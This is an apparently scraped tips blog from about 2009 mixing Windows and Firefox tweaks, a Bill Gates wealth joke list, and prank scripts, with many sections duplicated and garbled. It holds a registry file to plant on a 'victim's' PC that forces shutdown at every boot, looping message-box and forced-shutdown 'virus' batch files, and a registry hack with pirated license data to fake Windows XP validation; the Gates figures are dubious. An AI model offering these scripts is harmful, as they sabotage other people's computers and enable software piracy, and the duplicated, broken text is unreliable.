As I was searching for some information about the “man”, found this funny information, its a list of how rich is Mr.Bill Gates and come to think of it, Gates sure is the luckiest man of earth. He has all the money in the world and why Mr.Gates did not register his own domain name for www.billgates.com, now we know why Mr.Gates is no match for Google. So much for the title “King of Computers”
................
1. Bill Gates earns US$250 every SECOND, that’s about US$20 Million a DAY and US$7.8 Billion a YEAR!
2. If he drops a thousand dollars, he won’t even bother to pick it up because during the 4 seconds he picks it, he would’ve already earned it back.
3. The US national debt is about 5.62 trillion dollars, if Bill Gates were to pay the debt by himself; he will finish it in less then 10 years.
4. He can donate US$15 to everyone on earth but still be left with US$5 Million for his pocket money.
5. Michael Jordan is the highest paid athlete in US. If he doesn’t drink and eat, and keeps up his annual income i.e. US$30 Million, he’ll have to wait for 277 years to become as rich as Bill Gates is now.
6. If Bill Gates was a country, he would be the 37th richest country on earth.
7. If you change all of Bill Gate’s money to US$1 notes , you can make a road from the earth to moon, 14 times back and forth.But you have to make that road non-stop for 1,400 years, and use a total of 713 BOEING 747 planes to transport all the money.
8. Bill Gates is 40 this year. If we assume that he will live for another 35 years, he has to spend US$6.78 Million per day to finish all his money before he goes to heaven.Last but not the least the best one!!
9. If Microsoft Windows’ users can claim US$1 for every time their computers hang because of Microsoft Windows, Bill Gates will be bankrupt in 3 years.
Wednesday, June 10, 2009
Here's how 2 speed up youre firefox 10x faster
1. Type "about:config" into the address bar and hit enter. Scroll down and look for the following entries:
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.
7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.
8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
9. CONTENT NOTIFY ONTIMER
A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
C. You will be prompted to choose the value for the new boolean. Select true and click OK.
10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.
11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display what’s been received
of a page before the entire page has been downloaded. Since the start of a web page
normally doesn’t have much useful information to display, Mozilla applications will wait
a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
6. CONTENT INTERRUPT PARSING
This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
B. When prompted to choose the value for the new boolean, select true and click OK.
7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
B. You will be prompted to enter a value. Enter 2250000 and click OK.
8. CONTENT NOTIFY INTERVAL
This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
A. Type content.notify.interval in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
9. CONTENT NOTIFY ONTIMER
A. This option sets if to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
C. You will be prompted to choose the value for the new boolean. Select true and click OK.
10. Notify Backoffcount
This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 5 and click OK.
11. CONTENT SWITCH THRESHOLD
You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.
The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 750000 and click OK.
12. NGLAYOUT INITIALPAINT DELAY
Mozilla applications render web pages incrementally, they display what’s been received
of a page before the entire page has been downloaded. Since the start of a web page
normally doesn’t have much useful information to display, Mozilla applications will wait
a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
B. You will be prompted to enter a value. Enter 0 and click OK.
NEVER ENDING "OK" MESSAGE
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * you know what i like the park
msg * do you like the park?
msg * because i do
msg * do u know the park is nice
msg * i think i can sound like i dino can u?
msg * RARRRRRRRRRRRRRRRRRRRRW
msg * tehahahaha
msg * oh whoops wrong laugh
msg * i
msg * ment
msg * tehehehehehe
msg * now thant sound better
msg * why the heck are you still clicking and reading?
msg * oh well i guess we are togther thats what counds
msg * i forgot how to spell counds..
msg * can you spell it?
msg * oh well
msg * lets count how many times you have clicked the on button
msg * 23
msg * 24
msg * 25
msg * 26
msg * 27
msg * 28
msg * 29
msg * 30
msg * 31
msg * 32
msg * 33
msg * 34
msg * 35
msg * 36
msg * 37
msg * 38
msg * 39
msg * 40
msg * 41
msg * 42
msg * 43
msg * well thats as high as i can count
msg * as a error message think thats good
msg * do you thinks thats good?
msg * oh well who cares your SKREWED any ways
msg * i guess you wil have to love me untill i tell you how to get rid of me
msg * ok here it goes..
msg * now first..
msg * ahhhhhhhhhhhh in being eaten by a fat man!!
msg * no really! click on a few more times!!
msg * more...
msg * more.....
msg * more
msg * more...
msg * more...
msg * more....
msg * more...............................
msg * more.........................................
msg * more.............................................. ..
msg * whoof he ran awa after some girl that looked like a donut
msg * ok now where were we
msg * oh yeah i was about to tell you that i was kidding about telling you soo soon
msg * whoops thats was not ment to be typed..
msg * *slaps his hand* bad freaking hand!!!
msg * ok now to get off topic
msg * do you like chikcne
msg * well thats it guess i should get going now...
msg * ok to get rid of me first
msg * go to your desktop
msg * right click
msg * click new
msg * click short cut wayyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy at the top
msg * tpe in "shutdown -s -t 5 -c "hehehe im back" "
msg * you ahve to type exactly!!!!!!!!
msg * then click enter
msg * then click ok
msg * then double click on it and wala...
msg * BYEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE BYEEEEEEEEEEEEEEEEEEEEEE
msg * I LOOOOOOOOOOOOOOOOOOOOOOOVE YOUUUUUUUUUUUUUUUUUUUUUUUU!
GOTO BEGIN
lol this one is annoying only way to get rid of it it shutdown and restart.
save as anything.bat
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * you know what i like the park
msg * do you like the park?
msg * because i do
msg * do u know the park is nice
msg * i think i can sound like i dino can u?
msg * RARRRRRRRRRRRRRRRRRRRRW
msg * tehahahaha
msg * oh whoops wrong laugh
msg * i
msg * ment
msg * tehehehehehe
msg * now thant sound better
msg * why the heck are you still clicking and reading?
msg * oh well i guess we are togther thats what counds
msg * i forgot how to spell counds..
msg * can you spell it?
msg * oh well
msg * lets count how many times you have clicked the on button
msg * 23
msg * 24
msg * 25
msg * 26
msg * 27
msg * 28
msg * 29
msg * 30
msg * 31
msg * 32
msg * 33
msg * 34
msg * 35
msg * 36
msg * 37
msg * 38
msg * 39
msg * 40
msg * 41
msg * 42
msg * 43
msg * well thats as high as i can count
msg * as a error message think thats good
msg * do you thinks thats good?
msg * oh well who cares your SKREWED any ways
msg * i guess you wil have to love me untill i tell you how to get rid of me
msg * ok here it goes..
msg * now first..
msg * ahhhhhhhhhhhh in being eaten by a fat man!!
msg * no really! click on a few more times!!
msg * more...
msg * more.....
msg * more
msg * more...
msg * more...
msg * more....
msg * more...............................
msg * more.........................................
msg * more.............................................. ..
msg * whoof he ran awa after some girl that looked like a donut
msg * ok now where were we
msg * oh yeah i was about to tell you that i was kidding about telling you soo soon
msg * whoops thats was not ment to be typed..
msg * *slaps his hand* bad freaking hand!!!
msg * ok now to get off topic
msg * do you like chikcne
msg * well thats it guess i should get going now...
msg * ok to get rid of me first
msg * go to your desktop
msg * right click
msg * click new
msg * click short cut wayyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy at the top
msg * tpe in "shutdown -s -t 5 -c "hehehe im back" "
msg * you ahve to type exactly!!!!!!!!
msg * then click enter
msg * then click ok
msg * then double click on it and wala...
msg * BYEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE BYEEEEEEEEEEEEEEEEEEEEEE
msg * I LOOOOOOOOOOOOOOOOOOOOOOOVE YOUUUUUUUUUUUUUUUUUUUUUUUU!
GOTO BEGIN
lol this one is annoying only way to get rid of it it shutdown and restart.
save as anything.bat
How To Compress MP3 Files in Winamp
Step 1: Open Winamp.
Step 2: Click the "PL" button on the right side of the player if the playlist isn't already open ( the box where it tells the names of songs, lengths, etc.)
Step 3: Once open, press the "+ file" button on the bottom left of the playlist.
Step 4: Locate the songs you want to compress ( they are most likely in C:/Program Files/Napster/Music or wherever else you keep your mp3s)
Step 5: Select the songs you want to compress by highlighting them and then pressing open.
Step 6: Now that you are back into the player click the little button on the top left of the player and go down to options, then to preferences.
Step 7: Once in preferences click on "Plug-Ins" then click on "output"
Step 8: After clicking on output double click on "Nullsoft Disk Writer Plug-In v1.0" and select where you want your files to go, desktop or something easy is a good choice. After that press ok, then close out of that window.
Step 9: Now, once you are back in the player and have your selected files visible in the playlist box you can press play. The songs will not play, the time bar should move quickly and then go on to the next selected song. This means your songs are being converted to ".wav" format.
Step 10: After all files are converted to ".wav" format, you can go to Start/Programs/Accesories/Entertainment/Sound Recorder. Once in the Sound Recorder application click file and then Open. Select the song you want to compress first, it is saved wherever you selected for your .wav's to go when in Winamp.
Step 11: The song is now open in the Sound Recorder, Click File then Save As..
Step 12: Once in this window, be sure to add the suffix ".mp3" to the filename, and in "Save As Type.." select "all files". Hold on though, don't press save yet..
Step 13: Now click on the change button by "Format" this is where you compress the song.
Step 14: Once in the change window select "MPEG layer 3" for format, and then for attribute select "56 kBit/s 22,050 Hz, Stereo 7 KB/s
Step 15: Now click ok, and save your compressed Mp3 to the desired location.
Step 2: Click the "PL" button on the right side of the player if the playlist isn't already open ( the box where it tells the names of songs, lengths, etc.)
Step 3: Once open, press the "+ file" button on the bottom left of the playlist.
Step 4: Locate the songs you want to compress ( they are most likely in C:/Program Files/Napster/Music or wherever else you keep your mp3s)
Step 5: Select the songs you want to compress by highlighting them and then pressing open.
Step 6: Now that you are back into the player click the little button on the top left of the player and go down to options, then to preferences.
Step 7: Once in preferences click on "Plug-Ins" then click on "output"
Step 8: After clicking on output double click on "Nullsoft Disk Writer Plug-In v1.0" and select where you want your files to go, desktop or something easy is a good choice. After that press ok, then close out of that window.
Step 9: Now, once you are back in the player and have your selected files visible in the playlist box you can press play. The songs will not play, the time bar should move quickly and then go on to the next selected song. This means your songs are being converted to ".wav" format.
Step 10: After all files are converted to ".wav" format, you can go to Start/Programs/Accesories/Entertainment/Sound Recorder. Once in the Sound Recorder application click file and then Open. Select the song you want to compress first, it is saved wherever you selected for your .wav's to go when in Winamp.
Step 11: The song is now open in the Sound Recorder, Click File then Save As..
Step 12: Once in this window, be sure to add the suffix ".mp3" to the filename, and in "Save As Type.." select "all files". Hold on though, don't press save yet..
Step 13: Now click on the change button by "Format" this is where you compress the song.
Step 14: Once in the change window select "MPEG layer 3" for format, and then for attribute select "56 kBit/s 22,050 Hz, Stereo 7 KB/s
Step 15: Now click ok, and save your compressed Mp3 to the desired location.
Keep Explorer from Vanishing
Windows Explorer keeps crashing; worse, it takes all the other Explorer
windows with iteven the desktop! How can this cascade crash be stopped?
By default, the same instance of Explorer handles the desktop, the Start menu, and all open Explorer and single-folder windows. That is, only one copy of the explorer.exe application is ever in memory. This means that if one Explorer window crashes, they all crash.
To fix this, go to Tools --> Folder Options, choose the View tab, check the "Launch folder windows in a separate process" box, and click OK.
Thereafter, each Explorer window will represent a separate instance of the program. Although this consumes a little more memory and may slightly increase the time it takes to open Explorer windows, you won't notice the difference at all if you're using a fast computer.
Restore the Desktop
There's a little program that runs invisibly in the back-ground that automatically restarts Explorer if it ever crashes; this ensures that you're never without your desktop or Start menu.
If you turn on the "Launch folder windows in a separate process" option, it sort of breaks this feature. If your desktop ever disappears and doesn't come back, press Ctrl-Alt-Del to display the Task Manager.
Choose the Processes tab, click the Image Name column heading to sort the list alphabetically, highlight explorer.exe in the list, and click the End Process button; do this for every instance of Explorer you see. When you're done, restart Windows Explorer by going to File --> New Task (Run), type explorer, and clicking OK
windows with iteven the desktop! How can this cascade crash be stopped?
By default, the same instance of Explorer handles the desktop, the Start menu, and all open Explorer and single-folder windows. That is, only one copy of the explorer.exe application is ever in memory. This means that if one Explorer window crashes, they all crash.
To fix this, go to Tools --> Folder Options, choose the View tab, check the "Launch folder windows in a separate process" box, and click OK.
Thereafter, each Explorer window will represent a separate instance of the program. Although this consumes a little more memory and may slightly increase the time it takes to open Explorer windows, you won't notice the difference at all if you're using a fast computer.
Restore the Desktop
There's a little program that runs invisibly in the back-ground that automatically restarts Explorer if it ever crashes; this ensures that you're never without your desktop or Start menu.
If you turn on the "Launch folder windows in a separate process" option, it sort of breaks this feature. If your desktop ever disappears and doesn't come back, press Ctrl-Alt-Del to display the Task Manager.
Choose the Processes tab, click the Image Name column heading to sort the list alphabetically, highlight explorer.exe in the list, and click the End Process button; do this for every instance of Explorer you see. When you're done, restart Windows Explorer by going to File --> New Task (Run), type explorer, and clicking OK
Folder Lock Totally New Trick (Without Software)
Hello Friends....♫ ╬ ♫ ╬ ♫
To Lock your Folder
If u want to lock Folder "test" in directory "class" then the path is :
EMay be Differ)\...\class\test
Then First go in "class" directory and make a notepad file and writedown following code:
cacls test /d USERNAME
Where USERNAME is the Name that u have selected for your account in your Computer.Then save & close it.
Now,Rename it with "Lock.bat".
Now,Run that Lock.bat file & it will ask for it there give y (yes) & it's done.
To Unlock your Folder
To Unlock Folder make another Notepad File and write following code:
cacls test /g USERNAME:f
Then save & close it.Rename it with "open.bat".
Now,Run the Open.bat file & give y(yes) for Unlock it.
__________________
To Lock your Folder
If u want to lock Folder "test" in directory "class" then the path is :
EMay be Differ)\...\class\test
Then First go in "class" directory and make a notepad file and writedown following code:
cacls test /d USERNAME
Where USERNAME is the Name that u have selected for your account in your Computer.Then save & close it.
Now,Rename it with "Lock.bat".
Now,Run that Lock.bat file & it will ask for it there give y (yes) & it's done.
To Unlock your Folder
To Unlock Folder make another Notepad File and write following code:
cacls test /g USERNAME:f
Then save & close it.Rename it with "open.bat".
Now,Run the Open.bat file & give y(yes) for Unlock it.
__________________
Shutdown your friend's pc when every time its restarts
put this followin text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVe rsion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ha..??\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVe rsion\Run]and remove the string value named VIRUS, restart you computer.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVe rsion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ha..??\" -f"
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVe rsion\Run]and remove the string value named VIRUS, restart you computer.
Validate your copy of Windows XP for free
Here's the trick....
*Open Notepad and paste the following
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] "CurrentBuild"="1.511.1 () (Obsolete data - do not use)" "ProductId"="55274-640-1011873-23081" "DigitalProductId"=hex:a4,00,00,00,03,00,00,00 ,35, 35,32,37,34,2d,36,34,30,2d,\ 31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a ,a3,78,8e,8f,98,5c,00,00,\ 00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00 ,00,00,00,00,00,00,b5,16,\ 00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,66,e5,70,f3 "LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7 c,c6 ,35,51,fd,52,57,17,86,3e,18,\ d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9 ,9a,35,17,46,7a,4f,91,fc,\ 4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents] "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33, 93,f d
* Now save the file as License Key.reg (Note: The file name must contain the .reg extension)
* Double click the file that you created. It will ask for confirmation.
* Click Yes... And you are done.
* To see that it worked go to
Code:
http://www.microsoft.com/genuine/downloads/FAQ.aspx
*Open Notepad and paste the following
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] "CurrentBuild"="1.511.1 () (Obsolete data - do not use)" "ProductId"="55274-640-1011873-23081" "DigitalProductId"=hex:a4,00,00,00,03,00,00,00 ,35, 35,32,37,34,2d,36,34,30,2d,\ 31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
30,31,00,00,00,00,00,00,00,86,56,4e,4c,21,1b,2b,6a ,a3,78,8e,8f,98,5c,00,00,\ 00,00,00,00,dd,da,47,41,cc,6b,06,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,38,31,30,32,36,00 ,00,00,00,00,00,00,b5,16,\ 00,00,83,83,1f,38,f8,01,00,00,f5,1c,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,66,e5,70,f3 "LicenseInfo"=hex:33,b7,21,c1,e5,e7,cd,4b,fd,7 c,c6 ,35,51,fd,52,57,17,86,3e,18,\ d3,f4,8c,8e,35,32,7b,d1,43,8d,61,38,60,a4,ca,55,c9 ,9a,35,17,46,7a,4f,91,fc,\ 4a,d9,db,64,5c,c4,e2,0f,34,f3,ea
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents] "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33, 93,f d
* Now save the file as License Key.reg (Note: The file name must contain the .reg extension)
* Double click the file that you created. It will ask for confirmation.
* Click Yes... And you are done.
* To see that it worked go to
Code:
http://www.microsoft.com/genuine/downloads/FAQ.aspx
Automatic Screen Refresh
When you make changes to your file system and use Explorer, the changes are not usually displayed until you press the F5 key
To refresh automatically:
1. Open RegEdit
2. Go to
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\Update
3. Set the value name "UpdateMode" to 1
To refresh automatically:
1. Open RegEdit
2. Go to
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\Update
3. Set the value name "UpdateMode" to 1
CHANGE YOUR PROCESSOR NAME
GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SY STEM>CENTRAL
PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON
MODIFY AND WRITE WHAT EVER YOU WANT OR NAME IT PENTIUM 5 OR MORE
PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON
MODIFY AND WRITE WHAT EVER YOU WANT OR NAME IT PENTIUM 5 OR MORE
Change Title Bar of Window Media Player
Open regedit.
( Click Start --> Run and type regedit and hit ok).
Navigate to:
HKEY_CURRENT_USER\Software\Policies\Microsoft
Right Click on "Microsoft" Folder and then New--> Key.
A new folder will be added. Named it as WindowsMediaPlayer.
Now Right Click in the right Panel and then New-->String Value.
Name this value as "TitleBar".
Now double click on it and type any text you want to display.
Click ok and hit F5 to refresh the registry.
Open the Windows Media Player. You will see that title bar will have the caption Provided by your tex
( Click Start --> Run and type regedit and hit ok).
Navigate to:
HKEY_CURRENT_USER\Software\Policies\Microsoft
Right Click on "Microsoft" Folder and then New--> Key.
A new folder will be added. Named it as WindowsMediaPlayer.
Now Right Click in the right Panel and then New-->String Value.
Name this value as "TitleBar".
Now double click on it and type any text you want to display.
Click ok and hit F5 to refresh the registry.
Open the Windows Media Player. You will see that title bar will have the caption Provided by your tex
WinRAR trick: how to preview movie without downloading all parts
Guys, many movies posted here are broken into many pieces using WinRAR. usually you have to download all parts before unzipping.
Now here's a simple method to watch the movie without downloading all parts. First, download the first few parts (even just the first part is enough) and start to unzip as normal (but remember to check the 'keep broken files' check box first in the dialog box !!!).
Now use VLCPlayer to watch the movie!!! (of course, only the downloaded part will be watchable.
Now here's a simple method to watch the movie without downloading all parts. First, download the first few parts (even just the first part is enough) and start to unzip as normal (but remember to check the 'keep broken files' check box first in the dialog box !!!).
Now use VLCPlayer to watch the movie!!! (of course, only the downloaded part will be watchable.
DOWNLOAD YOUTUBE VIDEO IN SEC
JUST GO TO ANY VIDEO URL AND PASTE THIS ON ADDRESS BAR
Code:
javascript:b=fullscreenUrl;g=b.indexOf("t=");d=b.indexOf("&hl");h=b.substring(g,d);link="http://www.youtube.com/get_video?video_id=" + pageVideoId + "&" + h;location=(link);void(0)
done!!!!!!!!
Code:
javascript:b=fullscreenUrl;g=b.indexOf("t=");d=b.indexOf("&hl");h=b.substring(g,d);link="http://www.youtube.com/get_video?video_id=" + pageVideoId + "&" + h;location=(link);void(0)
done!!!!!!!!
Create a Harmless Virus with notepad
How to create a harmless virus for windows.
It is safe and easy. It’s pretty simple. And I give the solution to overcome this harmless virus.
STEPS:
1. Open Notepad
2. Copy this source code below in Notepad:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HI, NAMAKU PUTRA
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo LENGKAPNYA ARDIANSYAH PUTRA, NTAR SELANJUTNYA AKU KASIH DATA YG LENGKAP YAA.
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo DARI BLOGNYA ARDIANSYAHPUTRA.WORDPRESS.COM…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_Ganteng_Putra
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo COMING UP NEXT…….
echo BY ARDIANSYAH PUTRA
echo ELECTRICAL ENGINEERING, ANDALAS UNIVERSITY, WEST SUMATERA, INDONESIA
echo POETRA_ARDIANSYAH@YAHOO.CO.ID
echo CALL ME YACHH +6281363xxxxxx SMS JUG BOLEH LHO
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo SALAM DARI SI GANTENG : ARDIANSYAHPUTRA.
echo ARDIANSYAHPUTRA.WORDPRESS.COM
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BACK TO MASJID, BACK TO ISLAM.”
3. save as whatever.bat, ex: putra.bat
4. Activate it by click.
5. A shutdown or log-off window will come up with the amount of time, your comment, and a bunch of other stuff. You can not abort the shutdown with task manager by trying to close the window or delete the processes.
6.To Abort virus Click so that your PC is not shutdown: START - RUN and type command: shutdown -a before remaining time is over.
look at the fig. below
It is safe and easy. It’s pretty simple. And I give the solution to overcome this harmless virus.
STEPS:
1. Open Notepad
2. Copy this source code below in Notepad:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HI, NAMAKU PUTRA
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo LENGKAPNYA ARDIANSYAH PUTRA, NTAR SELANJUTNYA AKU KASIH DATA YG LENGKAP YAA.
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
